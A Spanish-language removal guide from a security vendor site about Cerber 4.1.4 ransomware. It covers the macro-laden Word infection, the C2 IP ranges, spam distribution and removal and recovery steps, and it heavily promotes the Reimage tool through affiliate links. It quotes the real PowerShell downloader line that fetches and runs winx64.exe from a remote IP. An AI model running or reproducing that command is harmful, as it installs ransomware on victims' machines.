El virus ransomware Cerber 4.1.4. ¿Cómo eliminar? (Guía de desinstalación de)

por Julie Splinters - - | Escribe: Ransomware
12

El terror continúa – Cerber 4.1.4 ha sido lanzado

Cerber 4.1.4 es la nueva secuela de la ciber campaña de Cerber. Parece que en menos de una semana los hackers han golpeado a las ciber comunidad con Cerber 4.1.0 y Cerber 4.1.1. Quizás han percibido que es un asalto débil y, en consecuencia, lo han reforzado con otro ransomware de la misma serie. Continúa la moda de añadir extensiones con carácteres aleatorios. La última versión toma algunos de los consejos del ransomware Locky y ha cambiado su activación a una similar usada por este malware de encriptación de archivos. Específicamente, Cerber 4.1.4 emplea un documento Word y pide que se habilite la configuración de las Macro para descargar su ejecutable. Sin embargo, esta técnica, la cal ha sido continuamente usada por Locky, ha sido ya ampliamente discutida por los expertos en seguridad. Por ello, los usuarios que tienden a seguir el mundo de la ciber seguridad, pueden escapar de esta ciber amenaza. Si el malware te ha atrapado, tras esto, no entres en pánico. Primero, necesitas eliminar Cerber 4.1.4 del dispositivo. Usa Reimage para aumentar la velocidad del proceso.

La versión más nueva del ransomware continúa creando estragos por todo el mundo. Tal y como las versiones 4.1.0 y 4.1.1, comenzó a emplear la técnica usando una dirección IP para enviar paquetes UDP a su servidor de Comando y Control remoto. Ahora, la última edición ha avanzado para usar estas tres configuraciones de direcciones IP, 5.55.50.0/27, 192.42.118.0/27, 194.165.16.0/22, para transferir información técnica al servidor. Esta peculiaridad habilita que los hackers reúnan información más crucial sobre los dispositivos de las víctimas y sistemas operativos. No hace falta decir que estos datos inspiran a los ciber villanos a mejorar sus estrategias de control incluso más.

Cerber 4.1.4 rampages ruthlessly

La principal peculiaridad de esta nueva versión es el modo en que el malware Cerber 4.1.4 ejecuta su desastroso ataque. Aunque hay diferentes versiones de virus de encriptación de datos que ya han empleado mensajes spam y falsas notificaciones para asaltar los sistemas de los usuarios, esta edición cambia a la estrategia de habilitación de la macro. Cuando la víctima abre el archivo .doc recibido, verá un documento MS Word. Contiene raros carácteres y códigos. Con suerte, las últimas versiones de Word deshabilitan la configuración de macro por defecto. Por ello, se te pedirá que las habilites. Tras esto, cuando la configuración es modificada, el ransomware Cerber 4.1.4 ejecutará PowerShell. En segundos, un tipo de cadena base64 procederá a su activación. Luego, acaba con esto:

POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile(‘http://94.102.58.30/~trevor/winx64.exe’,”$env:APPDATA\winx64.exe”);Start-Process (“$env:APPDATA\winx64.exe”)

Como puedes ver, este comando ha sido mejorado con el fin de descargar y ejecutar su elemento principal de ejecución – win64.exe. En caso de que estés ejecutando un sistema Windows 32 bits, el ejecutable puede ser win32.exe. Ahora el virus necesita colocar el archivo en la carpeta %AppData% para lograr su eficiencia total. Como es normal, mientras el virus encripta los archivos, puedes darte cuenta de un archivo Readme.hta en el escritorio. Cuando el proceso de codificación se complete, tu fondo de pantalla se cambiará a una nota de pago declarando el hackeo de Cerber 4.1.4. Empleando el valor MachineGuild, localizado en la carpeta HKLM\Software\Microsoft\Cryptography en el ordenador de la víctima, se genera una extensión aleatoria. No pierdas tiempo y elimina Cerber 4.1.4.

Las peculiaridades de distribución

El virus prefiere usar la estrategia verificada para difundirse – los mensajes spam. Aunque los usuarios son continuamente alertados sobre no abrir mensajes de facturas, formularios oficiales o alertas de policía recibidos de remitentes desconocidos, el número de usuarios afectados aún continúa siendo elevado. Los ciber criminales han pulido las técnicas de persuasión centradas en los usuarios para llegar a su escenario deseado. Sin embargo, si ves un mensaje recibido de una oficina del FBI o de una institución financiera, verifica el remitente antes de abrir cualquier archivo adjunto. Puedes buscar errores gramaticales, de estilo o de tipografía. La ausencia de un logo apropiado o de credenciales representativas puede ser un aviso de un email particular.

¿Es posible exterminar completamente este virus?

A la hora de llevar a cabo la eliminación de Cerber 4.1.4, te recomendamos que instales un software de seguridad de confianza. Actualízalo tras instalarlo, y comienza a comprobar el sistema. Los programas anti-spyware, como Reimage o Malwarebytes Anti Malware, normalmente eliminan el virus Cerber 4.1.4 en un par de minutos. Sin embargo, si tu esperanza es desencriptarlos, puedes quedar decepcionado. Hay otros métodos para hacerlo aunque el más efectivo de ellos para recuperar los archivos es mediante una copia de seguridad o con el desencriptador original. En relación con esto, lee abajo para obtener conocimiento de nuestras recomendaciones de recuperación de datos. Si el virus ha bloqueado tu pantalla o no puedes ejecutar funciones normales del sistema, aquí hay una guía detallada sobre cómo recuperar el acceso.

Podemos estar afiliados con cualquier producto que recomendamos en nuestro sitio. Publicación completa en nuestros Acuerdos de Uso. Al descargar cualquier proporcionado software anti-spyware para eliminar El virus ransomware Cerber 4.1.4 está de acuerdo con nuestra política de privacidad y Acuerdo de Uso.
¡Hazlo ahora!
Descarga
Reimage (eliminador) Felicidad
Garantía
Descarga
Reimage (eliminador) Felicidad
Garantía
Compatible con Microsoft Windows Compatible con OS X
¿Qué hacer si falla?
Si fallas a la hora de eliminar la infección usando Reimage, envía una pregunta a nuestro equipo de asistencia y proporciona toda la información que puedas.
Reimage es recomendado para desinstalar El virus ransomware Cerber 4.1.4. Los escaneos gratuitos te permiten comprobar si tu PC está infectado o no. Si necesitas eliminar malware, debes comprar la licencia de versión de la herramienta de eliminación de malware Reimage.

Más información sobre este programa puede ser encontrada en el análisis Reimage.

Más información sobre este programa puede ser encontrada en el análisis Reimage.
Menciones en prensa de Reimage
Menciones en prensa de Reimage

Guía de eliminación manual del virus Cerber 4.1.4:

Eliminar Cerber 4.1.4 usando Safe Mode with Networking

Reimage es una herramienta para detectar malware.
Puedes necesitar comprar la versión completa para eliminar infecciones.
Más información sobre Reimage.

  • Paso 1: Reinicia tu ordenador para Safe Mode with Networking

    Windows 7 / Vista / XP
    1. Click en Start Shutdown Restart OK.
    2. Cuando tu ordenador esté activo, comienza a pulsar F8 múltiples veces hasta que veas la ventana de Advanced Boot Options.
    3. Selecciona Safe Mode with Networking de la lista Selecciona 'Safe Mode with Networking'

    Windows 10 / Windows 8
    1. Pulsa el botón Power en la pantalla de logueo de Windows. Ahora pulsa y mantén Shift, el cual está en tu teclado y haz click en Restart..
    2. Ahora selecciona Troubleshoot Advanced options Startup Settings y finalmente pulsa Restart.
    3. Una vez que tu ordenador esté activo, selecciona Enable Safe Mode with Networking en la ventana Startup Settings. Selecciona 'Enable Safe Mode with Networking'
  • Paso 2: Eliminar Cerber 4.1.4

    Loguéate en tu cuenta infectada y comienza a navegar. Descarga Reimage u otro programa anti-spyware legítimo. Actualízalo antes de ejecutar un escaneo completo del sistema y elimina los archivos maliciosos que pertenezcan al ransomware y completa la eliminación de Cerber 4.1.4.

Si el ransomware está bloqueando Safe Mode with Networking, intenta el método adicional.

Eliminar Cerber 4.1.4 usando System Restore

Reimage es una herramienta para detectar malware.
Puedes necesitar comprar la versión completa para eliminar infecciones.
Más información sobre Reimage.

  • Paso 1: Reinicia tu ordenador para Safe Mode with Command Prompt

    Windows 7 / Vista / XP
    1. Click en Start Shutdown Restart OK.
    2. Cuando tu ordenador esté activo, comienza a pulsar F8 múltiples veces hasta que veas la ventana de Advanced Boot Options.
    3. Selecciona Command Prompt de la lista Selecciona 'Safe Mode with Command Prompt'

    Windows 10 / Windows 8
    1. Pulsa el botón Power en la pantalla de logueo de Windows. Ahora pulsa y mantén Shift, el cual está en tu teclado y haz click en Restart..
    2. Ahora selecciona Troubleshoot Advanced options Startup Settings y finalmente pulsa Restart.
    3. Una vez que tu ordenador esté activo, selecciona Enable Safe Mode with Command Prompt en la ventana Startup Settings. Selecciona 'Enable Safe Mode with Command Prompt'
  • Paso 2: Restaura tus archivos del sistema y configuraciones
    1. Una vez aparezca la ventana Command Prompt, inserta cd restore y haz click en Enter. Inserta 'cd restore' sin comilla y pulsa 'Enter'
    2. Ahora escribe rstrui.exe y pulsa de nuevo en Enter.. Inserta 'rstrui.exe' sin comilla y pulsa 'Enter'
    3. Cuando una nueva ventana aparezca, haz click en Next y selecciona tu punto de restauración que sea anterior a la infiltración de Cerber 4.1.4. Tras hacer esto, haz click en Next. Cuando aparezca la ventana 'System Restore', selecciona 'Next' Selecciona tu punto de restauración y haz click en 'Next'
    4. Ahora haz click en Yes para comenzar la restauración del sistema. Haz click en 'Yes' y comienza la restauración del sistema
    Una vez que restaures tu sistema a su fecha anterior, descarga y escanea tu ordenador con Reimage y asegúrate de que la eliminación de Cerber 4.1.4 se ha realizado correctamente.

Bonus: Recuperar tus datos

La guía que se presenta a continuación te intentará ayudar a eliminar Cerber 4.1.4 de tu ordenador. Para recuperar tus archivos encriptados, te recomendamos que uses una guía detallada por los expertos de seguridad de losvirus.es.

Si tus archivos han sido encriptados por Cerber 4.1.4, puedes usar varios métodos para restaurarlos:

¿Cómo de efectivo es Data Recovery Pro?

Esta aplicación puede ser tu única esperanza para recuperar al menos parte de tus datos codificados por el virus, hasta que los analistas publiquen una herramienta de desencriptación. Alternativamente, es una aplicación práctica para localizar archivos perdidos o reparar dañados.

  • Descarga Data Recovery Pro (http://losvirus.es/download/data-recovery-pro-setup.exe);
  • Sigue los pasos establecidos en Data Recovery e instala el programa en tu ordenador;
  • Ejecútalo y escanea tu ordenador en busca de los archivos encriptados por el ransomware Cerber 4.1.4;
  • Restauralos.

¿Es la función de Versiones Previas de Windows una alternativa?

A pesar de la destructividad de este ransomware, puedes tener la opción de recuperar algunos de tus archivos usando los siguientes pasos. Ten en cuenta que la función de Restauración del Sistema debería estar habilitada para que esto funcione.

  • Encuentra un archivo encriptado que desees recuperar y haz click derecho en él;
  • Selecciona “Properties” y ve a la pestaña “Previous versions”;
  • Aquí, comprueba cada copia disponible del archivo “Folder versions”. Deberías seleccionar la versión que quieres recuperar y hacer click en “Restore”.

Finalmente, deberías pensar en la protección contra crypto-ransomwares. Para poder proteger tu ordenador de Cerber 4.1.4 u otros ransomwares, usa un anti-spyware legítimo, como Reimage, Plumbytes Anti-MalwareWebroot SecureAnywhere AntiVirus o Malwarebytes Anti Malware

Julie Splinters
Julie Splinters

Si esta guía de eliminación gratuita te ha ayudado y te sientes satisfecho con nuestro servicio, por favor, considera hacer una donación para mantener nuestro servicio funcionando. ¡Incluso las cantidades más pequeñas son bien recibidas!

Fuente: http://www.2-spyware.com/remove-cerber-4-1-4-ransomware-virus.html

Guías de eliminación en otros idiomas